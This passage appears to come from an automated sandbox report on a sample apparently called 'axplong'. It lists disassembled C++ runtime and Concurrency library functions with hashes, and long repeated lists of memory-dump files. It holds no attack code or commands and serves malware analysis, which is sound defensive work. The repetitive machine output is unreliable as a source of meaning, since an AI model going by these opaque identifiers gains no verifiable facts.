                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3433162309-0
                                                                                                                                                                                                                                                    • Opcode ID: caa75e762b05d92ddf842c5dfd6c698c1a03dbb29f9a9be12f79c1b43b7b2589
                                                                                                                                                                                                                                                    • Instruction ID: a7bfd34b7495ca299e83a940432b63edae4b604fde5f8541d6744261ec084b6a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: caa75e762b05d92ddf842c5dfd6c698c1a03dbb29f9a9be12f79c1b43b7b2589
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD315775A0030AEFCF54DF94C8D0AAE7BBABF44314F1400AADD45AB746D730AA45DBA1
                                                                                                                                                                                                                                                    Function 006A1322 Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 006A1329
                                                                                                                                                                                                                                                    • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 006A1374
                                                                                                                                                                                                                                                    • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 006A13A7
                                                                                                                                                                                                                                                    • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 006A1457
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2092016602-0
                                                                                                                                                                                                                                                    • Opcode ID: dbb76dceb93fc4e74bfc50ba0b1f820ec9906dd39ac8f0598474a4eb28a81288
                                                                                                                                                                                                                                                    • Instruction ID: 52f1cddfaa3b28f9ea503256db1060670c7ae3af0ec83f9b5bb7cfe6285e4ce6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbb76dceb93fc4e74bfc50ba0b1f820ec9906dd39ac8f0598474a4eb28a81288
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52314BB1A006059BCF14EFA9C4919EDBBB7BF4A710B14822DE415AB781CB34AE41CF94
                                                                                                                                                                                                                                                    Function 0068BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 531285432-0
                                                                                                                                                                                                                                                    • Opcode ID: 38d89b9b20610809722cf3ee98bf08f0ba304c36a8301c590edf0ebdae7cbc53
                                                                                                                                                                                                                                                    • Instruction ID: f8a9e67e020de6273473b34b15e7b6530deb6edd8216084d38baa47171ea0b59
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38d89b9b20610809722cf3ee98bf08f0ba304c36a8301c590edf0ebdae7cbc53
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03214F71A011099FDF10FFA4DC45DBEBBBAEF08724F000169F601A7261DB34AD018BA5
                                                                                                                                                                                                                                                    Function 00699BC5 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 00699BCC
                                                                                                                                                                                                                                                    • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00699C18
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 00699C2E
                                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 00699C9A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2033596534-0
                                                                                                                                                                                                                                                    • Opcode ID: 2b9aff45e566ab8d1252ed3b527cf95f67df77e40fb2593bf8e66471ee033862
                                                                                                                                                                                                                                                    • Instruction ID: b731c1eecb79ee65bef322155620f362b120c063030337afd08d76c99e3388d0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b9aff45e566ab8d1252ed3b527cf95f67df77e40fb2593bf8e66471ee033862
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1217C71901114DFDF44EF68D9829ADB7EBAF15310B20402DF401AB691EB716D058B65
                                                                                                                                                                                                                                                    Function 00699F56 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00699F99
                                                                                                                                                                                                                                                      • Part of subcall function 0069B490: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0069B4DF
                                                                                                                                                                                                                                                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00699FAF
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00699FFB
                                                                                                                                                                                                                                                      • Part of subcall function 0069AA71: List.LIBCONCRT ref: 0069AAA7
                                                                                                                                                                                                                                                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0069A00B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
